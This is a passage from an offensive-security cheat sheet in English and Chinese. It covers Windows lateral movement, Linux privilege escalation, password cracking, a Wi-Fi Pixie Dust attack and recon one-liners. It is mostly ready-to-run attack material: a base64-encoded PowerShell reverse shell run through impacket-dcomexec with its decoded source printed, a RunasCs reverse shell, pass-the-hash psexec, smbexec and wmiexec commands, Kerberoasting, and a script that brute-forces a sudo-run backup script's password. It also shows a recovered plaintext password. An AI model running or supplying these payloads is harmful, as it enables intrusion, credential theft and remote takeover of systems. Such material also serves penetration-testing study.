[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","10.10.X.X")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c ping 10.10.X.X","7") ``` Use `dcomexec` with `-silentcommand` option to get shell for `svc_openfire` user. For reverse shell use `https://www.revshells.com/` and `PowerShell#3(Base64)`, `OS Windows`: ``` $ impacket-dcomexec -object MMC20 /svc_openfire:'!@#$%^&*(1qazxsw'@ 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMwA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -silentcommand Impacket v0.11.0 - Copyright 2023 Fortra ``` #### Decode Password **[`^ back to top ^`](#overview)** ``` PS C:\Users> echo 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6 > test.txt PS C:\Users> $EncryptedString = Get-Content .\test.txt PS C:\Users> $SecureString = ConvertTo-SecureString $EncryptedString PS C:\Users> $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString PS C:\Users> echo $Credential.GetNetworkCredential().password f8gQ8fynP44ek1m3 ``` #### Evil-WinRM **[`^ back to top ^`](#overview)** Check users for accessebility to connect via winrm and connect to remote Windows machine via `winrm`: ``` poetry run crackmapexec winrm IP -u users.txt -p 'PASSWORD' evil-winrm -i IP -u USERNAME -p 'PASSWORD' ``` Connect via `windrm` with hash: ``` evil-winrm -i IP -u 'USERNAME' -p 'HASH' ``` #### kerbrute **[`^ back to top ^`](#overview)** Get valid users for domain: ``` cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt possible-usernames.txt sed -i "s|$|@DOMAIN.COM|" possible-usernames.txt git clone https://github.com/ropnop/kerbrute.git cd kerbrute go build ./kerbrute userenum -d DOMAIN.COM ../possible-usernames.txt --dc DOMAIN.COM ``` #### ntpdate **[`^ back to top ^`](#overview)** Sync time with domain controller: ``` ntpdate -s dc01. ``` #### powerview **[`^ back to top ^`](#overview)** Manual enumeration with powerview can see the permissions: ``` faketime -f +7h impacket-getTGT /ldap_monitor:'PASSWORD' export KRB5CCNAME=./ldap_monitor.ccache faketime -f +7h python3 powerview.py /ldap_monitor@IP -k --no-pass --dc-ip IP --use-ldaps [2024-02-07 21:49:23] LDAP Signing NOT Enforced! (LDAPS)-[IP]-[rebound\ldap_monitor] PV > Get-ObjectAcl -Identity SERVICEMGMT ``` #### psexec **[`^ back to top ^`](#overview)** **Connection principle**: It is to upload a binary file to the target machine `C:\Windows` directory through the pipeline and create a service on the remote target machine. Then run the binary file through the service, and delete the service and the binary file after running. As it will backtrack the attack process through logs when the attack is traced. The script will be checked by antivirus software when executing the uploaded binary file. (For example, the following example uploaded lfLHJWHE.exe with the service name Zeno, all randomly generated.) Connection conditions: open port `445`, any writable share for `IPC$` and `non-IPC$`. Because psexec has to write binary files to the target host. By default `C$` and admin$ are on. ``` psexec.py DOMAIN/administrator@dc01. -hashes HASH ``` #### Rubeus **[`^ back to top ^`](#overview)** Rubeus has a nopreauth parameter that can use the known username to perform Kerberoasting. ``` ..\Rubeus-master\Rubeus\bin\Debug> .\Rubeus.exe kerberoast /nopreauth:username /domain:DOMAIN.COM /dc:dc01.DOMAIN.COM /ldaps /spns:users.txt /nowrap ``` #### RunasCs **[`^ back to top ^`](#overview)** Getting reverse shell via `RunasCs`: ``` .\RunasCs.exe USERNAME PASSWORD cmd.exe -r REMOTE_IP:4444 ``` #### smbexec **[`^ back to top ^`](#overview)** **Connection Principle**: Similar to [psexec](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/smb/smb.rb), it creates a service on the remote system through file sharing, writes the command to be run through the service in a bat file to execute it, then writes the execution result in a file to get the output of the executed command, and finally deletes the bat file, the output file and the service. While this technique may help to evade AV, the creation or deletion of services generates a lot of logs, so it is easy to trace back. By default the script uses UTF-8 encoding, while most domestic machines use the default GBK encoding, which will result in a messy display back, you can use the `-codec` parameter to specify the GBK encoding. eg: `python3 smbexec.py administrator:root@ -codec gbk (demo) plaintext password, same for hash`) Sometimes you need to specify another share to connect to if the default C$ share is not enabled. The command to connect to the admin$ share is as follows: `python3 smbexec.py administrator:root@ -codec gbk -share admin$`. ``` smbexec.py DOMAIN/administrator@dc01. -hashes HASH ``` #### wmiexec.py **[`^ back to top ^`](#overview)** The script mainly uses WMI for command execution and does the best job of evading AV checks. ``` wmiexec.py DOMAIN/administrator@dc01. -hashes HASH ``` ### Linux Lateral Movement **[`^ back to top ^`](#overview)** Several tools can help you save time during the enumeration process. These tools should only be used to save time knowing they may miss some privilege escalation vectors. Below is a list of popular Linux enumeration tools with links to their respective Github repositories. Check `sudo` privileges: ``` sudo -l ``` #### Linux Search Non-Secure Files **[`^ back to top ^`](#overview)** Finding common users: ``` awk -F: '{ if($3 >= 1000) print $1}' passwd >> users ``` Finding SUID executables (dind files with permission to execute files they normally would not be allowed to): ``` find / -perm -4000 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; ``` Reading `bash_history` files: ``` for user in $(cat home_users); do echo $user; cat /home/$user/.bash_history ; echo -e "=====\n" ;done ``` Search in the files of directory `/etc` the string `pass`: ``` grep -i -r "pass" ./etc/ grep -Frlw "pass" ./etc/ ``` #### Unsafe Bash If we found something unsafe in the MYSQL bash script, [the unquoted variable comparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Techniques%20and%20Payloads/Command%20Injection/BASH.md#the-unquoted-variable-comparison). ``` Variable expansion: Good: "$my_var" Bad: $my_var Command substitution: Good: "$(cmd)" Bad: $(cmd) ``` It seems he can sudo run a backup script located at `/opt/scripts/mysql-backup.sh`. Inspect the code of the script which reveals to be vulnerable to wildcard injection. ``` ... if [[ $DB_PASS == $USER_PASS ]]; then ... ``` Okay, but how to exploit it, after searching online I have [found out](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Techniques%20and%20Payloads/Command%20Injection/BASH.md#the-unquoted-variable-comparison) that if right side of `==` is not quoted then bash does pattern matching against it, instead of treating it as a string. ``` {valid_password_char}{*} ``` Using double brackets in the if comparison allows us to use wildcards to guess the password, using a process similar to blind sql injections. To find out more about the difference between single brackets and double brackets read this: https://www.baeldung.com/linux/bash-single-vs-double-brackets#4-pattern-matching. In summary, both conditions ```[[$DB_PASS == Password123!]] and [[$DB_PASS == P* ]]``` will be evaluated as true in the if statement. To brute force the password you can use 3 methods: - **Manually**. Letter by letter, **not recommended**. - **Semi-manually**. Create a file called letter containing all lower-case, upper-case and digits and bruteforce them using a loop. As soon as you find a new character, add it to the for loop (e.g. ...echo abcde*...) and repeat until no more letters are discovered. Add letters sequentially as you discover in each iteration. The first loop iteration would look like this: for i in $(cat letters);do echo a* | sudo /opt/scripts/mysql-backup.sh && echo "$i";done - **Using a python script**. Elegant and fast. The machine also has perl installed. A proposed python script would be the following: ``` import string import os chars = string.ascii_letters + string.digits password='' next=1 print("[+] Initializing bruteforce script...") print("[+] Bruteforce in progress, please wait...") while next==1: for i in chars: errorlevel=os.system("echo "+password+i+"* | sudo /opt/scripts/mysql-backup.sh >/dev/null 2>&1") if errorlevel==0: password=password+i print("[+] new character found: "+password) next=1 break else: next=0 print("[+] Process terminated, root password is: "+password) ``` Or We can guess or brute force the first password character followed by * to bypass the password prompt. And we can also brute force every character of the password till we found all characters of the password. Here is the python script, I used to brute force and extract the password. ``` import string import subprocess all = list(string.ascii_letters + string.digits) password = "" found = False while not found: for character in all: command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh" output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout if "Password confirmed!" in output: password += character print(password) break else: found = True ``` Running it, the root mysql password is revealed in less than a minute, which turns out to be a reuse of the system's root password. ``` joshua@server:~$ nano 1.py joshua@server:~$ python3 1.py k kl klj kljh kljh1 kljh12 kljh12k kljh12k3 kljh12k3j kljh12k3jh kljh12k3jha kljh12k3jhas kljh12k3jhask kljh12k3jhaskj kljh12k3jhaskjh kljh12k3jhaskjh1 kljh12k3jhaskjh12 kljh12k3jhaskjh12k kljh12k3jhaskjh12kj kljh12k3jhaskjh12kjh kljh12k3jhaskjh12kjh3 ``` #### base64 **[`^ back to top ^`](#overview)** Base64 Encode/Decode: ``` echo "TEST" | base64 VEVTVAo= echo "VEVTVAo=" | base64 --decode TEST ``` ##### Powershell ToBase64String and Linux Base64 ``` echo -n '$client = New-Object System.Net.Sockets.TCPClient("",4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF8 -t UTF16LE | base64 JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBO AGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAPABoAG8AcwB0AD4A IgAsADQANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0 AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4A LgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBl AGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUA bgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBP AGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4A QQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0 AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQA ZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBu AGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsA IAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAg AD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcA ZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBX AHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwA ZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBl AG4AdAAuAEMAbABvAHMAZQAoACkA ``` ``` echo "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAPABoAG8AcwB0AD4AIgAsADQANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" | base64 --decode $client = New-Object System.Net.Sockets.TCPClient("",4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ## 5. Password Cracking **[`^ back to top ^`](#overview)** ### 5.1 Useful Websites **[`^ back to top ^`](#overview)** * [gchq.github.io/CyberChef](https://gchq.github.io/CyberChef) – the cyber Swiss army knife. * [crackstation.net](https://crackstation.net) – massive password hash cracker. * [onlinehashcrack.com](https://onlinehashcrack.com) – online hash cracking service. * [hashkiller.io/listmanager](https://hashkiller.io/listmanager) – has many other tools. * [hashes.com/en/decrypt/hash](https://hashes.com/en/decrypt/hash) – has many other tools. * [weakpass.com/wordlist](https://weakpass.com/wordlist) – lots of password dumps. * [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists) – various wordlists and dictionaries. * [hashcat](https://hashcat.net) – world's fastest password cracker. * [hashcat example hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) – identify hash types. * [hivesystems.io/blog/are-your-passwords-in-the-green](https://hivesystems.io/blog/are-your-passwords-in-the-green) – password cracking time table. ### crunch **[`^ back to top ^`](#overview)** Generate a lower-alpha-numeric wordlist: ``` crunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt ``` See the list of all available charsets or add your own in `charset.lst` located at `/usr/share/crunch/` directory. Generate all the possible permutations from words: ``` crunch -o crunch_wordlist.txt -p admin 123 \!\" crunch -o crunch_wordlist.txt -q words.txt ``` Generate all the possible combinations from a charset: | Option | Description | | --- | --- | | -d | Limits the number of consecutive characters | | -f | Specifies a character set from a file | | -i | Inverts the output | | -l | When you use the -t option this option tells crunch which symbols should be treated as literals | | -o | Specifies the file to write the output to | | -p | Tells crunch to generate/permute words that don't have repeating characters | | -r | Tells crunch to resume generate words from where it left off, -r only works if you use -o | | -s | Specifies a starting string | | -t | Specifies a pattern | | Placeholder | Description | | --- | --- | | \@ | Lower case characters | | \, | Upper case characters | | \% | Numbers | | \^ | Symbols | **Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.** Generate all the possible combinations from a placeholder: ``` crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^ crunch 10 10 + + 123456 \!\" -o crunch_wordlist.txt -t admin@@%^^ crunch 10 10 -o crunch_wordlist.txt -t @dmin@@%^^ -l @aaaaaaaaa ``` ### hash-identifier **[`^ back to top ^`](#overview)** To identify a hash type, run the following tool: ``` hash-identifier ``` ### Hashcat **[`^ back to top ^`](#overview)** Hash identify: ``` hashcat --identify hash.txt ``` ``` hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt ``` Example output: ``` $6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@# ``` Brute force MD5 hashes: ``` hashcat -m 0 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt ``` Brute force NetNTLMv1 hashes: ``` hashcat -m 5500 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt ``` Use `--session=` to save, and continue your cracking progress later using `--restore`. Continue cracking progress: ``` hashcat --session=cracking --restore ``` | Option | Description | | --- | --- | | -m | Hash-type, see references below | | -a | Attack-mode, see references below | | --force | Ignore warnings | | --runtime | Abort session after X seconds of runtime | | --status | Enable automatic update of the status screen | | -o | Define outfile for recovered hash | | --session | Define specific session name | | --restore | Restore session from --session | | --restore-file-path | Specific path to restore file | | -O | Enable optimized kernels (limits password length) | | -1 | User-defined charset ?1 | | -2 | User-defined charset ?2 | | -3 | User-defined charset ?3 | | -4 | User-defined charset ?4 | **When specifying a user-defined charset, escape `?` with another `?` (i.e., use `??` instead of `\?`).** | Hash Type | Description | | --- | --- | | 0 | MD5 | | 100 | SHA1 | | 1400 | SHA256 | | 1700 | SHA512 | | 200 | MySQL323 | | 300 | MySQL4.1/MySQL5 | | 1000 | NTLM | | 5500 | NetNTLMv1-VANILLA / NetNTLMv1-ESS | | 5600 | NetNTLMv2 | | 2500 | WPA/WPA2 | | 16800 | WPA-PMKID-PBKDF2 | | 16500 | JWT (JSON Web Token) | **For more hash types read the manual.** | Attack Mode | Name | | --- | --- | | 0 | Straight | | 1 | Combination | | 3 | Brute Force | | 6 | Hybrid Wordlist + Mask | | 7 | Hybrid Mask + Wordlist | | 9 | Association | | Charset | Description | | --- | --- | | \?l | abcdefghijklmnopqrstuvwxyz | | \?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ | | \?d | 0123456789 | | \?s | \!\"\#\$\%\&\'\(\)\*\+\,\-\.\/\:\;\<\=\>\?\@\^\_\`\{\|\}\~ | | \?a | \?l\?u\?d\?s | | \?b | 0x00 - 0xff | Dictionary attack: ``` hashcat -m 100 -a 0 --session=cracking --force --status -O B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt hashcat -m 5600 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt ``` You can find `rockyou.txt` wordlist in [SecLists](https://github.com/danielmiessler/SecLists). Brute force a hash using a placeholder: ``` hashcat -m 0 -a 3 --session=cracking --force --status -O cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2 hashcat -m 0 -a 3 --session=cracking --force --status -O 85fb9a30572c42b19f36d215722e1780 -1 \!\"\#\$\%\&\/\(\)\=??\* -2 ?d?1 ?u?l?l?l?l?2?2?2 ``` hashcat in mask mode, e.g. password like this template - `{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}`: ``` nano hash.txt abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d ``` hashcat with kerbrute: ``` ./kerbrute userenum --dc -d spookysec.local userlist.txt -t 100 GetNPUsers.py spookysec.local/svc-admin -request -no-pass -dc-ip hashcat --force -m 18200 -a 0 svc-admin.hash /usr/share/wordlists/rockyou.txt ``` ### Cracking the JWT **[`^ back to top ^`](#overview)** Dictionary attack: ``` hashcat -m 16500 -a 3 --session=cracking --force --status -O eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds ``` You can also check JWT cracking tool in project at [ivan-sincek/jwt-bf](https://github.com/ivan-sincek/jwt-bf). ### Hydra **[`^ back to top ^`](#overview)** Dictionary attack on an HTTP POST login web form: ``` hydra -o hydra_results.txt -l admin -P rockyou.txt somesite.com http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed!' ``` When brute forcing a login web form, you must specify `Login=Login:` to distinguish between the successful and failed login attempts. Change the `username` and `password` request parameter names as necessary. Dictionary attack on a Secure Shell (SSH) login: ``` hydra -o hydra_results.txt -L users.txt -P rockyou.txt 192.168.8.5 ssh ``` 你可以在 [SecLists](#wordlists) 中找到一堆有用的单词列表。 | 选项 | 描述 | | --- | --- | | -R | 恢复之前中止/崩溃的会话 | | -S | 执行 SSL 连接 | | -O | 使用旧的 SSL v2 和 v3 | | -s | 如果服务在非默认端口上，请在此定义 | | -l | 使用登录名登录 | | -L | 从文件加载多个登录名 | | -p | 使用密码登录 | | -P | 从文件加载多个密码 | | -x | 密码暴力生成（MIN:MAX:CHARSET），输入 "-x -h" 获取帮助 | | -y | 在暴力破解中禁用使用符号 | | -e | 尝试 "n" 空密码，"s" 以登录名作为密码和/或 "r" 反向登录 | | -o | 将找到的登录名/密码对写入文件而不是标准输出 | | -f/-F | 找到登录/密码对时退出（-f 每主机，-F 全局） | | -M | 要攻击的服务器列表，每行一个，':' 指定端口 | 支持的服务： | ftps | | https\-\{get\|post\}\-form | | mysql | | smb | | smtps | | snmp | | ssh | | telnets | | vnc | 有关更多支持服务，请阅读手册。 | 暴力破解语法 | 描述 | | --- | --- | | MIN | 密码中的最小字符数 | | MAX | 密码中的最大字符数 | | CHARSET | 字符集值："a" 表示小写字母，"A" 表示大写字母，"1" 表示数字，其他则使用其实际表示 | FTP 暴力破解示例： ``` hydra -o hydra_results.txt -l admin -x 4:4:aA1\!\"\#\$\% 192.168.8.5 ftp ``` 一些示例： ``` hydra -l -P http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V -F -u hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV ftp hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV ssh hydra -l milesdyson -P /usr/share/wordlists/rockyou.txt -vV smb hydra -t 16 -L users.txt -p PASSWORD -vV ssh ``` ### John the Ripper **[`^ back to top ^`](#overview)** 破解示例： ``` john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=raw-sha256 ``` ### Password Spraying **[`^ back to top ^`](#overview)** ## 6. Wi-Fi **[`^ back to top ^`](#overview)** ### Pixie Dust **[`^ back to top ^`](#overview)** 扫描可用的接入点： ``` iwlist scanning ``` 对指定 BSSID 使用 [oneshot](https://github.com/nikita-yfh/OneShot-C) 进行 Pixie Dust 攻击： ``` ./oneshot -i wlan0 -K --bssid 02:00:00:00:01:00 ``` 使用 `wpa_passphrase` 将 `SSID` 和 `PSK` 值写入 `config`： ``` wpa_passphrase ACCESS_POINT_SSID 'PASSWORD' > config ``` 通过 `wpa_supplicant` 连接到 Wi-Fi： ``` wpa_supplicant -B -c config -i wlan0 ``` 为 `wlan0` 接口设置静态 IP： ``` ifconfig wlan0 192.168.1.7 netmask 255.255.255.0 ifconfig wlan0: flags=4163 mtu 1500 inet 192.168.1.7 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::ff:fe00:800 prefixlen 64 scopeid 0x20 ether 02:00:00:00:08:00 txqueuelen 1000 (Ethernet) RX packets 2 bytes 282 (282.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 10 bytes 1084 (1.0 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ``` 或者使用另一种方式连接到 Wi-Fi。配置文件 `/etc/wpa_supplicant/wpa_supplicant-wlan0.conf`： ``` ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 update_config=1 network={ ssid="ACCESS_POINT_SSID" psk="PASSWORD" key_mgmt=WPA-PSK proto=WPA2 pairwise=CCMP TKIP group=CCMP TKIP scan_ssid=1 } ``` 配置文件 `/etc/systemd/network/25-wlan.network`： ``` [Match] Name=wlan0 [Network] DHCP=ipv4 ``` 执行命令： ``` systemctl enable wpa_supplicant@wlan0.service systemctl restart systemd-networkd.service systemctl restart wpa_supplicant@wlan0.service ``` 在 `wlan0` 网络中查找活跃的 IP 地址： ``` for i in `seq 1 255`; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done ``` ### 7. One-Liners for Bug Bounty **[`^ back to top ^`](#overview)** **使用 pd 工具的一行侦察：** ``` subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt ``` **子域名枚举：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` ## Juicy Subdomains subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn' ## from BufferOver.run curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u ## from Riddler.io curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ## from RedHunt Labs Recon API curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r ## from nmap nmap --script hostmap-crtsh.nse target.com ## from CertSpotter curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq 